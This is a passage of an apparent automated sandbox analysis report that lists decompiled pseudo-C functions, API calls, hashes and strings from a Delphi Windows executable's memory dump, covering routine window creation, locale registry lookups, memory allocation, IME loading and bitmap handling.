RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,00423BB6), ref: 00423A88

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Open String ID: API String ID: 71445658-0 Opcode ID: 024347893320b92dfb4bad89f0ad8004936e86fda0b6909bc66a116ae120d134 Instruction ID: bbbba562cf4ef8ad2c766562c27961f1ed0d25de4a21f7584f0d3e043cf70339 Opcode Fuzzy Hash: 024347893320b92dfb4bad89f0ad8004936e86fda0b6909bc66a116ae120d134 Instruction Fuzzy Hash: 8821C230B04218AFDB11DEA5E952B9EB7F99B44304F5044BBB904E3282DB7DAF049608

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 82%

E0040730A(long __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) { CHAR* _v8; void* _t13; struct HWND__* _t24; CHAR* _t31; long _t38; _push(_t31); _v8 = _t31; _t38 = __eax; _t13 = E00403018(); _t24 = CreateWindowExA(_t38, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed E00403008(_t13); return _t24; } 0x0040730f 0x00407313 0x00407318 0x0040731a 0x0040734b 0x00407354 0x00407360

APIs

CreateWindowExA.USER32 ref: 0040734B

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateWindow String ID: API String ID: 716092398-0 Opcode ID: b58db20c084d251a18b2a55008c9825ef2296b69c151f418164321b74b5c3328 Instruction ID: b85b0cc3f2e5bc7e9d45a46899a2df812a80ae235cc29424d0f8592cef13ccd6 Opcode Fuzzy Hash: b58db20c084d251a18b2a55008c9825ef2296b69c151f418164321b74b5c3328 Instruction Fuzzy Hash: 3FF074B2705118BF9B40DE9DDC81D9B7BECEB4D264B054169FA08E3201D635ED1087A4

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E0040730C(long __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) { CHAR* _v8; void* _t13; struct HWND__* _t24; CHAR* _t29; long _t32; _v8 = _t29; _t32 = __eax; _t13 = E00403018(); _t24 = CreateWindowExA(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed E00403008(_t13); return _t24; } 0x00407313 0x00407318 0x0040731a 0x0040734b 0x00407354 0x00407360

APIs

CreateWindowExA.USER32 ref: 0040734B

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateWindow String ID: API String ID: 716092398-0 Opcode ID: af7131fd70f04d561484b010640c15216212988d875a779ef6235dcc54e20eb2 Instruction ID: e61e4b7de7878b32b5720a0b5ecd670a84b3b3b45b0905eabb5fb271e5fc7604 Opcode Fuzzy Hash: af7131fd70f04d561484b010640c15216212988d875a779ef6235dcc54e20eb2 Instruction Fuzzy Hash: 52F097B2605118BF9B40DE9DDC81DDF7BECEB4D264B054169FA0CE3201D635ED1087A4

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E00407364(CHAR* __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) { long _v8; void* _t12; struct HWND__* _t22; long _t27; CHAR* _t30; _v8 = _t27; _t30 = __eax; _t12 = E00403018(); _t22 = CreateWindowExA(0, _t30, __edx, _v8, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed E00403008(_t12); return _t22; } 0x0040736b 0x00407370 0x00407372 0x004073a1 0x004073aa 0x004073b6

APIs

CreateWindowExA.USER32 ref: 004073A1

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateWindow String ID: API String ID: 716092398-0 Opcode ID: 624295222e5b5063965c5aa621892c6fe0a9898fd49347bfc06a69575b0ebae6 Instruction ID: 85808ded18d7c00b20e9529308029099665b44857ea87863c4fce7c96cc8d2ed Opcode Fuzzy Hash: 624295222e5b5063965c5aa621892c6fe0a9898fd49347bfc06a69575b0ebae6 Instruction Fuzzy Hash: A4F092B2605118BFDB80DE9EDC81E9B7BECEB4D265B00416AFA0CE7241D535ED1087A4

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E00405C1C(void* __eax) { char _v272; intOrPtr _t14; void* _t16; intOrPtr _t18; CHAR* _t19; _t16 = __eax; if( *((intOrPtr*)(__eax + 0x10)) == 0) { _t3 = _t16 + 4; // 0x400000 GetModuleFileNameA( *_t3, &_v272, 0x105); _t14 = E00405E80(_t19); // executed _t18 = _t14; *((intOrPtr*)(_t16 + 0x10)) = _t18; if(_t18 == 0) { _t5 = _t16 + 4; // 0x400000 *((intOrPtr*)(_t16 + 0x10)) = *_t5; } } _t7 = _t16 + 0x10; // 0x400000 return *_t7; } 0x00405c24 0x00405c2a 0x00405c36 0x00405c3a 0x00405c43 0x00405c48 0x00405c4a 0x00405c4f 0x00405c51 0x00405c54 0x00405c54 0x00405c4f 0x00405c57 0x00405c62

APIs

GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00405C3A Part of subcall function 00405E80: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00400000,00461790), ref: 00405E9C Part of subcall function 00405E80: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00400000,00461790), ref: 00405EBA Part of subcall function 00405E80: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00400000,00461790), ref: 00405ED8 Part of subcall function 00405E80: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405EF6 Part of subcall function 00405E80: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,00405F85,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405F3F Part of subcall function 00405E80: RegQueryValueExA.ADVAPI32(?,004060EC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00405F85,?,80000001), ref: 00405F5D Part of subcall function 00405E80: RegCloseKey.ADVAPI32(?,00405F8C,00000000,?,?,00000000,00405F85,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405F7F

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Open$FileModuleNameQueryValue$Close String ID: API String ID: 2796650324-0 Opcode ID: bc21d5101fc51bdf4626e6ca00cb4df6505cc7613c57e159f19c307d06cb48aa Instruction ID: 1b0a8c2aa0dbabf6a82ae7d2e2fcdd13184de0ac0e476d2ee2bc6056b14444b1 Opcode Fuzzy Hash: bc21d5101fc51bdf4626e6ca00cb4df6505cc7613c57e159f19c307d06cb48aa Instruction Fuzzy Hash: 9BE06D71A007108FDB10EE98C8C5A9333D8EB08754F0005A6ED98EF386D374DD908BD4

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E00455FB4(intOrPtr _a4) { long _t27; _t27 = DefWindowProcA( *( *((intOrPtr*)(_a4 - 4)) + 0x30), *( *(_a4 - 8)), ( *(_a4 - 8))[1], ( *(_a4 - 8))[2]); // executed ( *(_a4 - 8))[3] = _t27; return _t27; } 0x00455fde 0x00455fe9 0x00455fed

APIs

DefWindowProcA.USER32(?,?,?,?), ref: 00455FDE

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: ProcWindow String ID: API String ID: 181713994-0 Opcode ID: feadc97ff837b75b266de6139b99dc6f72c8cfb3ed8b0667b2d15d3104d4f2d8 Instruction ID: a24cf2be33493bd3f548c5cb2912f0d98b4921db6f5013c36e2596895fdb8764 Opcode Fuzzy Hash: feadc97ff837b75b266de6139b99dc6f72c8cfb3ed8b0667b2d15d3104d4f2d8 Instruction Fuzzy Hash: 5DF0C579205608AFCB40DF9DC588D4AFBE9BB4C760B058195B988CB321C234FD80CF90

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E00421724(intOrPtr _a4, intOrPtr _a8) { void* __ebx; void* _t14; void _t15; void* _t24; intOrPtr _t25; char* _t26; void* _t35; if( *0x466304 == 0) { _t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed _t35 = _t14; _t15 = *0x466300; // 0x690000 *_t35 = _t15; _t1 = _t35 + 4; // 0x4 E00402EFC(0x461bf0, _t24, 2, _t1); _t2 = _t35 + 5; // 0x5 *((intOrPtr*)(_t35 + 6)) = E0042171C(_t2, E004216FC); _t4 = _t35 + 0xa; // 0xa _t26 = _t4; do { *_t26 = 0xe8; _t5 = _t35 + 4; // 0x4 *((intOrPtr*)(_t26 + 1)) = E0042171C(_t26, _t5); *((intOrPtr*)(_t26 + 5)) = *0x466304; *0x466304 = _t26; _t26 = _t26 + 0xd; } while (_t26 - _t35 < 0xffc); *0x466300 = _t35; } _t25 = *0x466304; *0x466304 = *((intOrPtr*)(_t25 + 5)); *((intOrPtr*)(_t25 + 5)) = _a4; *((intOrPtr*)(_t25 + 9)) = _a8; return *0x466304; } 0x00421732 0x00421742 0x00421747 0x00421749 0x0042174e 0x00421750 0x0042175d 0x00421767 0x0042176f 0x00421772 0x00421772 0x00421775 0x00421775 0x00421778 0x00421782 0x00421787 0x0042178a 0x0042178c 0x00421793 0x0042179a 0x0042179a 0x004217a2 0x004217a7 0x004217ac 0x004217b2 0x004217b9

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00421742

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual String ID: API String ID: 4275171209-0 Opcode ID: 89e6221551a74eb15f9e48ced21239ad1d285c4e27d512bd12529dafe54f9687 Instruction ID: 827c15edd165ef37d5224862c0752f9a577ccbf913505635d27218b0d4be8635 Opcode Fuzzy Hash: 89e6221551a74eb15f9e48ced21239ad1d285c4e27d512bd12529dafe54f9687 Instruction Fuzzy Hash: EC1148782403159FC710DF19D880B42B7E5EB98790F24C53AE9598B396E3B4E9058BA9

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E004016C8(signed int __eax) { void* _t4; intOrPtr _t7; signed int _t8; void* _t10; void** _t15; void* _t17; _t8 = __eax; E0040165C(__eax); _t4 = VirtualAlloc(0, 0x140000, 0x1000, 4); // executed if(_t4 == 0) { *0x463720 = 0; return 0; } else { _t15 = *0x46370c; // 0x25e0000 _t10 = _t4; *_t10 = 0x463708; *0x46370c = _t4; *(_t10 + 4) = _t15; *_t15 = _t4; _t17 = _t4 + 0x140000; *((intOrPtr*)(_t17 - 4)) = 2; *0x463720 = 0x13fff0 - _t8; _t7 = _t17 - _t8; *0x46371c = _t7; *(_t7 - 4) = _t8 | 0x00000002; return _t7; } } 0x004016c9 0x004016cb 0x004016de 0x004016e5 0x00401736 0x0040173e 0x004016e7 0x004016e7 0x004016ed 0x004016ef 0x004016f5 0x004016fa 0x004016fd 0x00401701 0x0040170c 0x00401719 0x00401721 0x00401723 0x00401730 0x00401733 0x00401733

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,00401AFF,?,004020BD), ref: 004016DE

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual String ID: API String ID: 4275171209-0 Opcode ID: 529b24f2eb1d7a78af4946a119c865930d0c7bde26a066f6f9e42cf2a5f2b5b0 Instruction ID: 2b17dd7dffbc5f012c9b03bba10325585f0ff40c38224672d8caf756a086162d Opcode Fuzzy Hash: 529b24f2eb1d7a78af4946a119c865930d0c7bde26a066f6f9e42cf2a5f2b5b0 Instruction Fuzzy Hash: C0F037F0B013405BEB09DFBA9D513026AD2E78934AF14C13AE609EB3A8F7B585018B18

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

C-Code - Quality: 83%

E004474DC() { int _v8; intOrPtr _t4; struct HINSTANCE__* _t11; struct HINSTANCE__* _t13; struct HINSTANCE__* _t15; struct HINSTANCE__* _t17; struct HINSTANCE__* _t19; struct HINSTANCE__* _t21; struct HINSTANCE__* _t23; struct HINSTANCE__* _t25; struct HINSTANCE__* _t27; struct HINSTANCE__* _t29; intOrPtr _t40; intOrPtr _t42; intOrPtr _t44; _t42 = _t44; _t4 = *0x462f3c; // 0x4658c8 if( *((char*)(_t4 + 0xc)) == 0) { return _t4; } else { _v8 = SetErrorMode(0x8000); _push(_t42); _push(0x447642); _push( *[fs:eax]); *[fs:eax] = _t44; if( *0x466548 == 0) { *0x466548 = GetProcAddress(GetModuleHandleA("USER32"), "WINNLSEnableIME"); } if( *0x46268c == 0) { *0x46268c = LoadLibraryA("imm32.dll"); if( *0x46268c != 0) { _t11 = *0x46268c; // 0x0 *0x46654c = GetProcAddress(_t11, "ImmGetContext"); _t13 = *0x46268c; // 0x0 *0x466550 = GetProcAddress(_t13, "ImmReleaseContext"); _t15 = *0x46268c; // 0x0 *0x466554 = GetProcAddress(_t15, "ImmGetConversionStatus"); _t17 = *0x46268c; // 0x0 *0x466558 = GetProcAddress(_t17, "ImmSetConversionStatus"); _t19 = *0x46268c; // 0x0 *0x46655c = GetProcAddress(_t19, "ImmSetOpenStatus"); _t21 = *0x46268c; // 0x0 *0x466560 = GetProcAddress(_t21, "ImmSetCompositionWindow"); _t23 = *0x46268c; // 0x0 *0x466564 = GetProcAddress(_t23, "ImmSetCompositionFontA"); _t25 = *0x46268c; // 0x0 *0x466568 = GetProcAddress(_t25, "ImmGetCompositionStringA"); _t27 = *0x46268c; // 0x0 *0x46656c = GetProcAddress(_t27, "ImmIsIME"); _t29 = *0x46268c; // 0x0 *0x466570 = GetProcAddress(_t29, "ImmNotifyIME"); } } _pop(_t40); *[fs:eax] = _t40; _push(0x447649); return SetErrorMode(_v8); } } 0x004474dd 0x004474e1 0x004474ea 0x0044764c 0x004474f0 0x004474fa 0x004474ff 0x00447500 0x00447505 0x00447508 0x00447512 0x0044752b 0x0044752b 0x00447537 0x00447547 0x00447553 0x0044755e 0x00447569 0x00447573 0x0044757e 0x00447588 0x00447593 0x0044759d 0x004475a8 0x004475b2 0x004475bd 0x004475c7 0x004475d2 0x004475dc 0x004475e7 0x004475f1 0x004475fc 0x00447606 0x00447611 0x0044761b 0x00447626 0x00447626 0x00447553 0x0044762d 0x00447630 0x00447633 0x00447641 0x00447641

APIs

SetErrorMode.KERNEL32(00008000), ref: 004474F5 GetModuleHandleA.KERNEL32(USER32,00000000,00447642,?,00008000), ref: 00447519 GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00447526 LoadLibraryA.KERNEL32(imm32.dll,00000000,00447642,?,00008000), ref: 00447542 GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00447564 GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00447579 GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 0044758E GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 004475A3 GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 004475B8 GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 004475CD GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 004475E2 GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 004475F7 GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 0044760C GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00447621 SetErrorMode.KERNEL32(?,00447649,00008000), ref: 0044763C

Strings

ImmSetConversionStatus , xrefs: 00447598 ImmIsIME , xrefs: 00447601 ImmReleaseContext , xrefs: 0044756E ImmNotifyIME , xrefs: 00447616 USER32 , xrefs: 00447514 ImmGetCompositionStringA , xrefs: 004475EC WINNLSEnableIME , xrefs: 00447520 ImmSetOpenStatus , xrefs: 004475AD ImmGetContext , xrefs: 00447559 ImmGetConversionStatus , xrefs: 00447583 ImmSetCompositionWindow , xrefs: 004475C2 imm32.dll , xrefs: 0044753D ImmSetCompositionFontA , xrefs: 004475D7

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorMode$HandleLibraryLoadModule String ID: ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll API String ID: 3397921170-3950384806 Opcode ID: 85cd7dde39b5c599270180dfbc2611d832bb0dc38289b90c796d1fbcd3152a98 Instruction ID: e70fe7214d08f84b75ceb215c1bd47e4ba2206317c64f215ae3433f6c64e5f95 Opcode Fuzzy Hash: 85cd7dde39b5c599270180dfbc2611d832bb0dc38289b90c796d1fbcd3152a98 Instruction Fuzzy Hash: 16314CF0644B10BFEB04EB69ED06A153BA9A304314713463AF102D72A0E7FD6811CB2E

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 72%

E00428690(struct HBITMAP__* __eax, struct HPALETTE__* __ecx, struct HPALETTE__* __edx, intOrPtr _a4, signed int _a8) { struct HBITMAP__* _v8; struct HPALETTE__* _v12; struct HPALETTE__* _v16; struct HPALETTE__* _v20; void* _v24; struct HDC__* _v28; struct HDC__* _v32; struct HDC__* _v36; BITMAPINFO* _v40; void* _v44; intOrPtr _v48; struct tagRGBQUAD _v52; struct HPALETTE__* _v56; intOrPtr _v116; intOrPtr _v120; intOrPtr _v132; intOrPtr _v136; void _v140; struct tagRECT _v156; void* __ebx; void* __ebp; signed int _t229; int _t280; signed int _t289; signed short _t291; struct HBRUSH__* _t365; struct HPALETTE__* _t421; signed int _t440; intOrPtr _t441; intOrPtr _t443; intOrPtr _t444; void* _t454; void* _t456; void* _t458; intOrPtr _t459; _t456 = _t458; _t459 = _t458 + 0xffffff68; _push(_t418); _v16 = __ecx; _v12 = __edx; _v8 = __eax; _v20 = 0; if( *(_a8 + 0x18) == 0 || *(_a8 + 0x1c) != 0 && *(_a8 + 0x20) != 0) { if( *(_a8 + 0x18) != 0 || *(_a8 + 4) != 0 && *(_a8 + 8) != 0) { E0042824C(_v8); _v116 = 0; if(_v8 != 0 && GetObjectA(_v8, 0x54, &_v140) < 0x18) { E00426B00(); } _v28 = E00426C14(GetDC(0)); _v32 = E00426C14(CreateCompatibleDC(_v28)); _push(_t456); _push(0x428cde); _push( *[fs:edx]); *[fs:edx] = _t459; if( *(_a8 + 0x18) >= 0x28) { _v40 = E00402D0C(0x42c); _push(_t456); _push(0x4289e8); _push( *[fs:edx]); *[fs:edx] = _t459; *(_a8 + 0x18) = 0x28; *((short*)(_a8 + 0x24)) = 1; if( *(_a8 + 0x26) == 0) { _t289 = GetDeviceCaps(_v28, 0xc); _t291 = GetDeviceCaps(_v28, 0xe); _t418 = _t289 * _t291; *(_a8 + 0x26) = _t289 * _t291; } memcpy(_v40, _a8 + 0x18, 0xa << 2); *(_a8 + 4) = *(_a8 + 0x1c); _t440 = _a8; *(_t440 + 8) = *(_a8 + 0x20); if( *(_a8 + 0x26) > 8) { _t229 = *(_a8 + 0x26) & 0x0000ffff; if(_t229 == 0x10) { L30: if(( *(_a8 + 0x28) & 0x00000003) != 0) { E00428644(_a8); _t104 = &(_v40->bmiColors); // 0x29 _t440 = _t104; E00402EFC(_a8 + 0x40, _t418, 0xc, _t440); } } else { _t440 = _a8; if(_t229 == 0x20) { goto L30; } } } else { if( *(_a8 + 0x26) != 1 || _v8 != 0 && _v120 != 0) { if(_v16 == 0) { if(_v8 != 0) { _v24 = SelectObject(_v32, _v8); if(_v116 <= 0 || _v120 == 0) { asm("cdq"); GetDIBits(_v32, _v8, 0, ( *(_a8 + 0x20) ^ _t440) - _t440, 0, _v40, 0); } else { _t280 = GetDIBColorTable(_v32, 0, 0x100, &(_v40->bmiColors)); _t440 = _a8; *(_t440 + 0x38) = _t280; } SelectObject(_v32, _v24); } } else { _t76 = &(_v40->bmiColors); // 0x29 _t440 = _t76; E004273B0(_v16, 0xff, _t440); } } else { _t440 = 0; _v40->bmiColors = 0; *((intOrPtr*)(_v40 + 0x2c)) = 0xffffff; } } _v20 = E00426C14(CreateDIBSection(_v28, _v40, 0, &_v44, 0, 0)); if(_v44 == 0) { E00426B6C(_t418); } if(_v8 == 0 || *(_a8 + 0x1c) != _v136 || *(_a8 + 0x20) != _v132 || *(_a8 + 0x26) <= 8) { _pop(_t441); *[fs:eax] = _t441; _push(0x4289ef); return E00402D28(_v40); } else { asm("cdq"); GetDIBits(_v32, _v8, 0, ( *(_a8 + 0x20) ^ _t440) - _t440, _v44, _v40, 0); E00404230(); E00404230(); goto L58; } } else { if(( *(_a8 + 0x10) & 0x0000ffff | *(_a8 + 0x12)) != 1) { _v20 = E00426C14(CreateCompatibleBitmap(_v28, *(_a8 + 4), *(_a8 + 8))); } else { _v20 = E00426C14(CreateBitmap( *(_a8 + 4), *(_a8 + 8), 1, 1, 0)); } E00426C14(_v20); _v24 = E00426C14(SelectObject(_v32, _v20)); _push(_t456); _push(0x428c8f); _push( *[fs:eax]); *[fs:eax] = _t459; _push(_t456); _push(0x428c7e); _push( *[fs:eax]); *[fs:eax] = _t459; _v56 = 0; _t421 = 0; if(_v16 != 0) { _v56 = SelectPalette(_v32, _v16, 0); RealizePalette(_v32); } _push(_t456); _push(0x428c5c); _push( *[fs:eax]); *[fs:eax] = _t459; if(_a4 == 0) { PatBlt(_v32, 0, 0, *(_a8 + 4), *(_a8 + 8), 0xff0062); } else { _t365 = E004261BC( *((intOrPtr*)(_a4 + 0x14))); E004193B4(0, *(_a8 + 4), 0, &_v156, *(_a8 + 8)); FillRect(_v32, &_v156, _t365); SetTextColor(_v32, E00425400( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18)))); SetBkColor(_v32, E00425400(E00426180( *((intOrPtr*)(_a4 + 0x14))))); if( *(_a8 + 0x26) == 1 && *((intOrPtr*)(_a8 + 0x14)) != 0) { _v52 = E00425400( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18))); _v48 = E00425400(E00426180( *((intOrPtr*)(_a4 + 0x14)))); SetDIBColorTable(_v32, 0, "true", &_v52); } } if(_v8 == 0) { _pop(_t443); *[fs:eax] = _t443; _push(0x428c63); if(_v16 != 0) { return SelectPalette(_v32, _v56, 0xffffffff); } return 0; } else { _v36 = E00426C14(CreateCompatibleDC(_v28)); _push(_t456); _push(0x428c32); _push( *[fs:eax]); *[fs:eax] = _t459; _t454 = E00426C14(SelectObject(_v36, _v8)); if(_v12 != 0) { _t421 = SelectPalette(_v36, _v12, 0); RealizePalette(_v36); } if(_a4 != 0) { SetTextColor(_v36, E00425400( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18)))); SetBkColor(_v36, E00425400(E00426180( *((intOrPtr*)(_a4 + 0x14))))); } BitBlt(_v32, 0, 0, *(_a8 + 4), *(_a8 + 8), _v36, 0, 0, 0xcc0020); if(_v12 != 0) { SelectPalette(_v36, _t421, 0xffffffff); } E00426C14(SelectObject(_v36, _t454)); _pop(_t444); *[fs:eax] = _t444; _push(0x428c39); return DeleteDC(_v36); } } } else { goto L58; } } else { L58: return _v20; } } 0x00428691 0x00428693 0x00428699 0x0042869c 0x0042869f 0x004286a2 0x004286a7 0x004286b1 0x004286d4 0x004286f3 0x004286fa 0x00428701 0x0042871a 0x0042871a 0x0042872b 0x0042873c 0x00428741 0x00428742 0x00428747 0x0042874a 0x00428754 0x004287be 0x004287c3 0x004287c4 0x004287c9 0x004287cc 0x004287d2 0x004287dc 0x004287ea 0x004287f2 0x004287ff 0x00428804 0x0042880b 0x0042880b 0x0042881f 0x0042882a 0x00428833 0x00428836 0x00428841 0x00428911 0x00428919 0x00428924 0x0042892b 0x00428930 0x00428938 0x00428938 0x00428946 0x00428946 0x0042891b 0x0042891b 0x00428922 0x00000000 0x00000000 0x00428922 0x00428847 0x0042884f 0x0042887d 0x0042889b 0x004288ae 0x004288b5 0x004288ea 0x004288fa 0x004288bd 0x004288cf 0x004288d4 0x004288d7 0x004288d7 0x00428907 0x00428907 0x0042887f 0x00428882 0x00428882 0x0042888d 0x0042888d 0x0042885d 0x00428860 0x00428862 0x0042886e 0x0042886e 0x0042884f 0x00428967 0x0042896e 0x00428970 0x00428970 0x00428979 0x004289d4 0x004289d7 0x004289da 0x004289e7 0x0042899e 0x004289ae 0x004289be 0x004289c3 0x004289c8 0x00000000 0x004289c8 0x00428756 0x00428768 0x004287ac 0x0042876a 0x00428788 0x00428788 0x004289f2 0x00428a09 0x00428a0e 0x00428a0f 0x00428a14 0x00428a17 0x00428a1c 0x00428a1d 0x00428a22 0x00428a25 0x00428a2a 0x00428a2d 0x00428a33 0x00428a44 0x00428a4b 0x00428a4b 0x00428a52 0x00428a53 0x00428a58 0x00428a5b 0x00428a62 0x00428b38 0x00428a68 0x00428a6e 0x00428a8c 0x00428a9c 0x00428ab4 0x00428ace 0x00428adb 0x00428af4 0x00428b07 0x00428b16 0x00428b16 0x00428adb 0x00428b41 0x00428c3b 0x00428c3e 0x00428c41 0x00428c4a 0x00000000 0x00428c56 0x00428c5b 0x00428b47 0x00428b55 0x00428b5a 0x00428b5b 0x00428b60 0x00428b63 0x00428b78 0x00428b7e 0x00428b8f 0x00428b95 0x00428b95 0x00428b9e 0x00428bb3 0x00428bcd 0x00428bcd 0x00428bf5 0x00428bfe 0x00428c07 0x00428c07 0x00428c16 0x00428c1d 0x00428c20 0x00428c23 0x00428c31 0x00428c31 0x00428b41 0x00000000 0x00000000 0x00000000 0x00428ce5 0x00428ce5 0x00428cee 0x00428cee

APIs

